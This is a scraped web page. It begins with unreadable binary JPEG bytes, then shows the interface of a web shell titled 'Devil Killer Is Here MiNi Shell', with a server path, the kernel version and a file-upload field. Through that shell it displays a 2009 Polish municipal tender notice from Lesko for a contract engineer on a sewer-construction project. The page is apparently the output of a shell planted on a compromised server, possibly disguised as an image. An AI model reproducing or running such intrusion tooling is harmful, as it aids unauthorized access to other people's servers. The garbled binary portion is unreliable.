JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/148481-N-2009.html

<p class="kh_header"><b>Lesko: Pełnienie funkcji Inżyniera dla kontraktu 
Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku.</b><br>
<b>Numer ogłoszenia: 148481 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lesko , ul. Parkowa 1, 38-600 Lesko, woj. podkarpackie, tel. 013 4698001, 4698158, faks 0-13 4696458.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera dla kontraktu 
Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie obowiązków Inżyniera dla inwestycji objętej projektem (Budowę kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku). W zakres zamówienia wchodzi: kompleksowa obsługa realizacji inwestycji, organizowanie i koordynacja robót budowlanych przez osoby o odpowiednich kwalifikacjach zawodowych i z przypisanymi im zakresami obowiązków i odpowiedzialności. Do obowiązków Wykonawcy będzie należało również wykonywanie wszelkich obowiązków wynikających z wypełniania funkcji inspektora nadzoru zgodnie z polskim prawem budowlanym oraz funkcji Inżyniera pełnionej zgodnie z warunkami FIDIC: Warunki Kontraktowe dla Budowy - (Czerwona książka) - (drugie wydanie angielsko-polskie, 2004, tłumaczenie pierwszego wydania FIDIC 1999) w zakresie warunków zawartych w Kontrakcie.
Dla potrzeb realizacji kontraktu Inżynier zapewni swojemu personelowi biuro o odpowiednim standardzie zlokalizowane na terenie gminy Lesko.

Do zakresu prac objętych umową należą w szczególności:

1. 1.	Zapewnienie swojemu personelowi Inżyniera biura o odpowiednim standardzie zlokalizowanego na terenie gminy Lesko. Biuro powinno zostać utworzone nie później niż przed rozpoczęciem robót budowlanych.
1. 2.	Analiza dokumentacji projektowej oraz weryfikacja projektów budowlanych, co do zgodności z dokumentacją ofertową, prawem budowlanym, polskimi normami, zasadami wiedzy technicznej oraz projektów wykonawczych, rysunków warsztatowych z punktu widzenia standardów zastosowanych materiałów oraz zgodności z pozwoleniem na budowę, a w przypadku gdyby wystąpiła konieczność uzupełnienia lub poprawienia tych projektów obowiązkiem Inżyniera będzie zorganizowanie wykonania uzupełnienia lub poprawienia projektów na koszt Zamawiającego. Uzupełnienie projektów obejmuje również wykonanie czynności związanych ze zorganizowaniem prac projektowych dotyczących kanalizacji i przyłączy na koszt Zamawiającego, aby zapewnić podłączenie wszystkich budynków znajdujących się na obszarze objętym projektem.
1. 3.	Przeprowadzenie ewentualnych zmian w dokumentacji z uzyskiwaniem stosownych zezwoleń wraz z koordynacją działań z nadzorem autorskim i instytucją nadzorującą realizację projektu.
1. 4.	W przypadku gdyby zaistniała taka konieczność wyjaśnienie w imieniu Zamawiającego wszelkich wątpliwości dotyczących projektu i zawartych w nim rozwiązań.
1. 5.	Sprawdzenie czy uzyskano wymagane przepisami opinie, uzgodnienia i pozwolenia, a w przypadku gdyby zachodziła konieczność ich uzupełnienia lub zaktualizowania obowiązkiem Inżyniera będzie uzyskanie niezbędnych opinii, uzgodnień i pozwoleń, z wyłączeniem tych, do których uzyskania zobowiązany jest Zamawiający, Projektant lub Wykonawca robót budowlano-montażowych.
1. 6.	Sprawdzenie poprawności ubezpieczeń i gwarancji z warunkami kontraktu na roboty budowlane. 
1. 7.	Ustanowienie inspektorów nadzoru we wszystkich branżach występujących w obiekcie ze wskazaniem inspektora nadzoru - koordynatora, zgodnie z art. 27 ustawy prawo budowlane. 
1. 8.	Przekazanie Wykonawcy Robót do realizacji projektów budowlanych i wykonawczych. 
1. 9.	Przygotowanie placu budowy do przejęcia przez Wykonawcę Robót.
1. 10.	Ustalenie w porozumieniu z Zamawiającym harmonogramu rzeczowo-finansowego na lata 2009 i 2010 oraz kontrola zgodności rzeczywistej realizacji poszczególnych robót wchodzących w skład inwestycji z przyjętym harmonogramem.
1. 11.	Egzekwowanie terminowego wykonania robót przez Wykonawcę Robót zgodnie z zatwierdzonym harmonogramem robót.
1. 12.	Wyegzekwowanie od Wykonawcy Robót zapewnienia ochrony i ubezpieczenia budowy oraz mienia w sposób uzgodniony z Zamawiającym.
1. 13.	Wyegzekwowanie od Wykonawcy Robót bieżącego utrzymania czystości dróg dojazdowych oraz przyległego terenu do zaplecza budowy.
1. 14.	Wyegzekwowanie od Wykonawcy Robót prowadzenia prawidłowej obsługi geodezyjnej.
1. 15.	Koordynacja wykonania robót.
1. 16.	Zapewnienie przestrzegania i stosowania polskiego prawa budowlanego i innych przepisów związanych z wykonywanym zadaniem przez Wykonawcę robót.
1. 17.	Zapewnienie, że zakończone prace są zgodne z technicznymi i formalnymi wymaganiami kontraktu na roboty.
1. 18.	Bieżąca kontrola zgodności wykonania robót  z zatwierdzoną dokumentacją projektową w zakresie wszystkich branż, pozwoleniami, przepisami prawa, polskimi normami oraz zasadami wiedzy technicznej.
1. 19.	Wydawanie Wykonawcy Robót, kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących usunięcia nieprawidłowości  lub zagrożeń, wykonania prób lub badań, a także odkrywek.
1. 20.	Wstrzymanie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie, bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
1. 21.	Prowadzenie kontroli jakości wszystkich wykonywanych prac zgodnie z procedurami oraz normami; wbudowanych materiałów i wyrobów, a w szczególności zapobieganie zastosowaniu wyrobów wadliwych i nie dopuszczonych do stosowania w budownictwie.
1. 22.	Organizowanie dodatkowych testów jakości przez specjalistyczne instytuty, jeżeli jest to niezbędne na koszt Zamawiającego.
1. 23.	Sprawdzanie wszystkich certyfikatów, ubezpieczeń, zabezpieczeń, gwarancji, praw własności itd., za które Wykonawca Robót jest odpowiedzialny zgodnie z warunkami kontraktu.
1. 24.	Dokumentowanie przebiegu robót m. in. poprzez dokonywanie wpisów w dzienniku budowy oraz sporządzanie innych dokumentów opisujących przebieg budowy, wykonywania zdjęć fotograficznych, itp.
1. 25.	Ustalanie zakresu ewentualnych robót zamiennych, opracowywanie protokołów konieczności wykonywania tych robót z odpowiednim uzasadnieniem, w celu uzyskania akceptacji ze strony Zamawiającego.
1. 26.	Weryfikacja i analiza rysunków wykonawczych i dokumentów wykonawczych sporządzanych przez Wykonawcę Robót, w przypadku jeśli chodzi o zgodność lub niezgodność z kontraktami na roboty budowlane.
1. 27.	Weryfikacja i przeglądanie rysunków roboczych Wykonawcy robót zawierających zmiany.
1. 28.	Zatwierdzanie robót zamiennych.
1. 29.	Przeprowadzanie odbioru robót zanikających (ulegających zakryciu) i odbiorów częściowych (etapowych), uczestniczenie w próbach, technologicznych rozruchach i odbiorach instalacji, urządzeń technicznych i przewodów.
1. 30.	Prowadzenie i przechowywanie korespondencji z podmiotami biorącymi udział w realizacji kontraktów na roboty ze szczególnym uwzględnieniem ostrzeżeń, uwag i wniosków kierowanych do Wykonawcy Robót mogących być dowodami w razie ewentualnych sporów, roszczeń Wykonawcy Robót, katastrof budowlanych itp.
1. 31.	Udzielanie pomocy we wszystkich działaniach Zamawiającego związanych z realizacją i rozliczeniem wniosku o dofinansowanie zadania (Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku) w ramach Regionalnego Programu Operacyjnego tj. wnioski o płatność, sprawozdania przejściowe i końcowe, monitoring, raportowanie i finansowe rozliczenia, kontrola nad czasową realizacja wniosku, monitorowanie wskaźników projektu.
1. 32.	Prowadzenie polubownych uzgodnień w przypadku zaistnienia konfliktu pomiędzy Zamawiającym, a osobami uczestniczącymi w realizacji zadania w tym szczególności osobami i podmiotami na których terenie będzie realizowany projekt oraz osobami i podmiotami, które będą przyłączane do kanalizacji sanitarnej.
1. 33.	Organizowanie, prowadzenie oraz sporządzanie protokołów z regularnych spotkań z wykonawcami, podwykonawcami i innymi uczestnikami realizacji inwestycji w celu omówienia i ustalenia procedur organizacyjnych, omówienia postępu robót i ich jakości, harmonogramów wykonawców i podwykonawców robót, zaangażowanego potencjału siły roboczej i problematyki BHP, zgodności wykonywania robot z przepisami prawa, orzeczeń i uzgodnień właściwych organów oraz przepisami normatywnymi, wpływu czynników zewnętrznych na realizację inwestycji.
1. 34.	Koordynowanie i wdrożenie systemu odbioru wykonywanych robót z uwzględnieniem przekazania dokumentacji powykonawczej, przeprowadzenia rozruchów technologiczno-instalacyjnych, dostarczenia kompletu świadectw, atestów, instrukcji obsługi urządzeń oraz innych dokumentów odbiorowych.
1. 35.	Uczestnictwo przy testowaniu poszczególnych systemów instalacyjnych w celu sprawdzenia zgodności ich wykonania z dokumentacją techniczną i sprawdzenie ich wzajemnego współdziałania.
1. 36.	Opiniowanie projektów aneksów do umowy z Wykonawcą Robót.
1. 37.	Weryfikacja kosztorysów w zakresie przedmiaru robót oraz zastosowanych nośników cen.
1. 38.	Analiza wraz z potwierdzeniem zasadności oraz sprawdzanie dokumentów rozliczeniowych za wykonane roboty pod względem merytorycznym i rachunkowym, ustalanie i określanie wartości robót, udział w przygotowywaniu Przejściowych Świadectw Płatności.
1. 39.	Kontrola prawidłowości wystawianych faktur co do wystąpienia przesłanek do ich wystawienia, zakresu i kwoty na zasadach określonych w umowie z Wykonawcą Robót bez prawa ich odbioru.
1. 40.	Weryfikacja Przejściowych Świadectw Płatności, przygotowywanie protokołów konieczności i negocjacji.
1. 41.	Realizacja całości zadania zgodnie z wytycznymi programowania Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013 i wnioskiem na dofinansowanie całości realizacji projektu (Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku).
1. 42.	Monitoring postępu kontraktu na roboty budowlane łącznie z raportowaniem, biorąc pod uwagę wskaźniki rzeczowe i finansowe realizowanego projektu. Forma i zawartość oraz terminy wykonania dokumentów muszą być zgodne z Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013. Obowiązek raportowania obejmuje: raporty miesięczne, raport końcowy oraz ewentualne raporty dodatkowe.
1. 43.	Opracowywanie i przekazywanie Zamawiającemu raportów miesięcznych, raportu końcowego oraz ewentualnie raportów dodatkowych w sposób opisany w pkt 3.
1. 44.	Egzekwowanie opracowania przez Wykonawcę robót instrukcji eksploatacji i konserwacji urządzeń oraz dostarczenie jej w uzgodnionej ilości egzemplarzy do Zamawiającego.
1. 45.	Przygotowanie materiałów koniecznych do dokonania odbioru końcowego i odbiorów częściowych:
a)	potwierdzenie w dzienniku budowy gotowości obiektu do odbioru końcowego i odbioru częściowego,
b)	skompletowanie dokumentacji powykonawczej,
c)	skompletowanie dokumentów zamontowanego wyposażenia  i urządzeń (karty gwarancyjne, instrukcje itp.),
d)	koordynowanie odbiorów specjalistycznych: Państwowej Inspekcji Sanitarnej, Państwowej Inspekcji Pracy, Państwowej Straży Pożarnej i innych wymaganych przepisami lub przez dostawców mediów,
e)	wystąpienie do Zamawiającego z wnioskiem o powołanie komisji odbioru końcowego, następnie powiadomienie o odbiorze wszystkich uczestników procesu inwestycyjnego i przeprowadzenie procesu odbioru końcowego wraz ze sporządzeniem protokołu.
1. 46.	Zorganizowanie i przeprowadzenie odbioru końcowego (inspekcji końcowej) i sporządzenie protokołu odbioru końcowego, Świadectwa Przejęcia, listy wad i usterek z terminem ich usunięcia oraz innych dokumentów związanych z warunkami kontraktu.
1. 47.	Skompletowanie dokumentacji Wykonawcy Robót i oświadczeń wymaganych przez odpowiednie uregulowania oraz współpraca z Zamawiającym w otrzymaniu zezwolenia na użytkowanie.
1. 48.	Przekazanie wykonanego zadania Zamawiającemu wraz z kompletem wymaganych dokumentów, w tym dokumentacji powykonawczej.
1. 49.	Naliczanie kar umownych dla Wykonawcy Robót i przekazywanie danych Zamawiającemu w celu ich egzekwowania.
1. 50.	Ustalenie podstaw i wysokości obniżenia należności Wykonawcy Robot z tytułu obniżenia jakości robót.
1. 51.	Pomoc Zamawiającemu w realizacji uprawnień z tytułu rękojmi i gwarancji.
1. 52.	Wykonanie rozliczeń końcowych i dokonanie ich uzgodnień z wykonawcami robót, przy udziale przedstawicieli Zamawiającego.
1. 53.	Rozliczenie końcowe wykonanego zadania inwestycyjnego w ciągu 30 dni do daty odbioru końcowego wraz z przygotowaniem druków PT i OT.
1. 54.	Rozliczenie finansowe i formalne wniosku o dofinansowanie zadania (Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku) w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013.
1. 55.	W okresie gwarancyjnym (Okres Zgłaszania Wad), przeprowadzenie przeglądów pogwarancyjnych, nadzorowanie i egzekwowanie usuwania wad przez Wykonawcę Robót, koordynacja zwolnień zatrzymanych kwot,  wydanie Świadectwa Wykonania, przygotowanie i wydanie Końcowego Świadectwa Płatności.
1. 56.	Pomoc Zamawiającemu w występowaniu przed sądami powszechnymi w sprawach dotyczących zobowiązań umownych uczestników procesu inwestycyjnego. 
1. 57.	Występowanie w imieniu Zamawiającego przed organami administracji w zakresie przedmiotowym związanym z prowadzoną inwestycją.
1. 58.	Przygotowanie niezbędnych dokumentacji do finansowego i merytorycznego rozliczenia dofinansowania udzielonego z Europejskiego Funduszu Rozwoju Regionalnego w Ramach Priorytetu II - VII Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007 - 2013 w ramach wniosku (Budowa kanalizacji sanitarnej w miejscowościach Lesko (d. Posada Leska,), Postołów, Wola Postołowa, Jankowce, Glinne i Huzele oraz przebudowę odcinków kanalizacji sanitarnej i deszczowej w Lesku).
1. 59.	Inne czynności i zadania nie wymienione powyżej, które okażą sie konieczne dla prawidłowej realizacji kontraktu na roboty budowlane.
2.	Charakterystyka inwestycji, której nadzorowanie stanowi przedmiot zamówienia.
1.	Budowa kanalizacji sanitarnej w miejscowości Lesko, d. Posada Leska
Zadanie obejmować będzie budowę kolektora grawitacyjnego z uzbrojeniem w postaci studzienek kanalizacyjnych.. Długość kanalizacji sanitarnej grawitacyjnej   3,092 km. Przyłączenie 55 budynków.
2.	Budowa kanalizacji sanitarnej w miejscowości Jankowce
Zadanie obejmować będzie sieć kanalizacyjną dla miejscowości Jankowce, budowę kolektora grawitacyjnego długości 10,63 km  z uzbrojeniem w postaci studzienek kanalizacyjnych. Przyłączenie 122 budynków.
 
3.	Budowę kanalizacji sanitarnej w miejscowości Glinne
Zadanie będzie obejmować budowę  kanalizacji sanitarnej długości 7,07 km, kanalizacji tłocznej o długości 1,607 km z uzbrojeniem w postaci studzienek kanalizacyjnych oraz wykonanie urządzeń towarzyszących
tj. 8 wysokowydajnych przepompowni ścieków, przyłączy energetycznych kablowych ziemnych służących do zasilania przedmiotowych przepompowni ścieków. Przyłączenie 74 budynków.

4.	Budowa kanalizacji sanitarnej w miejscowości Postołów i Lesko o. Wola Postołowa
Zadanie będzie obejmować budowę sieci kanalizacyjnej sanitarnej grawitacyjnej długości 13,079 km, kanalizacji sanitarnej tłocznej długości 1,564 km warz z uzbrojeniem w postaci studzienek kanalizacyjnych oraz budowa  7 wysokowydajnych przepompowni ścieków wraz z  przyłączami energetycznymi kablowymi ziemne służącymi do zasilania przedmiotowych przepompowni ścieków, zabezpieczenia skrzyżowań kanalizacji z uzbrojeniem podziemnym (sieci gazociągowe, teletechniczne
i energetyczne itp.) oraz z przeszkodami terenowymi (drogi, rzeka San, potoki, rowy melioracyjne i tereny zdrenowane). Przyłączenie 79 budynków.


5.	Budowa kanalizacji sanitarnej i kanalizacji deszczowej w miejscowości Lesko
Zadanie obejmować będzie naprawę nawierzchni asfaltowych po wykonanej kanalizacji sanitarnej i deszczowej ok. 680 m2.

6.	Budowa kanalizacji sanitarnej w miejscowości Huzele
Zadanie obejmować będzie budowę sieci kanalizacji sanitarnej grawitacyjnej o długości 8,284 km, kanalizacji sanitarnej tłocznej o długości 1,734 km oraz wykonanie urządzeń towarzyszących tj. 6 wysokowydajnych przepompowni ścieków (w tym 3 sieciowe) wraz z przyłączami energetycznymi kablowymi ziemnymi służącymi do zasilania przedmiotowych przepompowni ścieków. Przyłączenie 114 budynków.
Wartość robót budowlanych netto wynosi 13 676 650 zł.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) 	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) 	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) 	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
e) 	spełniają następujące warunki dodatkowe:
ea)	dysponują lub będą dysponować minimum po jednej osobie o poniższych kwalifikacjach zawodowych, doświadczeniu i wykształceniu:
-	(Inżynier Rezydent (szef zespołu) - wykształcenie wyższe prawnicze lub wyższe techniczne, o co najmniej 5 - letnim doświadczeniu w pracach zespołu  Inżyniera (Inżyniera Kontraktu) na stanowisku Inżyniera (Inżyniera Kontraktu) lub Inżyniera Rezydenta lub Specjalisty ds. Rozliczeń; który uczestniczył w pracach zespołu Inżyniera (Inżyniera Kontraktu) w co najmniej 3 projektach z zakresu ochrony środowiska, przy czym wartość netto robót wyniosła w jednym z projektów powyżej 13 mln zł, a co najmniej 2 projekty realizowane wg Warunków Kontraktu FIDIC.
-	Menedżer kosztów - wykształcenie wyższe ekonomiczne lub wyższe techniczne,  o co najmniej 5 - letnim doświadczeniu w pracach zespołu Inżyniera (Inżyniera Kontraktu) na stanowisku na stanowisku związanym z rozliczaniem robót budowlano-montażowych; który uczestniczył w pracach zespołu Inżyniera (Inżyniera Kontraktu) w co najmniej 3 projektach z zakresu ochrony środowiska, przy czym wartość netto robót wyniosła w jednym z projektów powyżej 13 mln zł, a co najmniej 2 projekty realizowane wg Warunków Kontraktu FIDIC.
-	Inspektor Nadzoru - specjalista w zakresie robót instalacyjnych i sieci sanitarnych -  wykształcenie techniczne oraz minimum 10-letnie doświadczenie zawodowe w nadzorowaniu robót lub kierowaniu robotami, w tym uczestniczył przynajmniej w trzech projektach obejmujących budowę kanalizacji sanitarnej realizowanych wg Warunków Kontraktu FIDIC, w tym jeden o długości min 20 km. Ma posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
-	Inspektor Nadzoru - specjalista w zakresie robót sieci, instalacji, urządzeń elektrycznych i automatyki, posiadający: wykształcenie techniczne oraz minimum 10-letnie doświadczenie zawodowe w nadzorowaniu robót elektrycznych i aparatury kontrolno-pomiarowej i automatyki lub kierowaniu robotami elektrycznymi i aparatury kontrolno-pomiarowej i automatyki w tym uczestniczył przynajmniej w dwóch projektach  z zakresu gospodarki wodno ściekowej realizowanych wg Warunków Kontraktu FIDIC, Posiada uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.

	Wszystkie osoby wymienione  w ppkt ea) muszą się posługiwać językiem polskim lub dysponować na stałe tłumaczem języka polskiego.

eb)	wykonali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną usługę podobną do objętej przedmiotem zamówienia. Za usługę podobną Zamawiający uzna realizację kontraktu usługowego dotyczącego inwestycji wodno - ściekowych, który obejmował pełnienie funkcji Inspektora Nadzoru dla zadań realizowanych według warunków kontraktowych FIDIC o wartości netto nadzorowanych robót nie mniej niż 6 mln zł (kwoty w walutach innych niż złote zostaną przeliczone wg kursu średniego NBP obowiązującego w dniu ogłoszenia niniejszego przetargu)
ec)	osiągnęli w każdym z ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, roczne przychody netto ze sprzedaży na poziomie minimum 100 000,00 PLN. 
ed)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 000 PLN..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy z Wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty   potwierdzające spełnienie warunków udziału w postępowaniu: 
a)	oświadczenie Wykonawcy, według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp;
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty wspólnej w/w dokument składa każdy z Wykonawców składających ofertę wspólną.
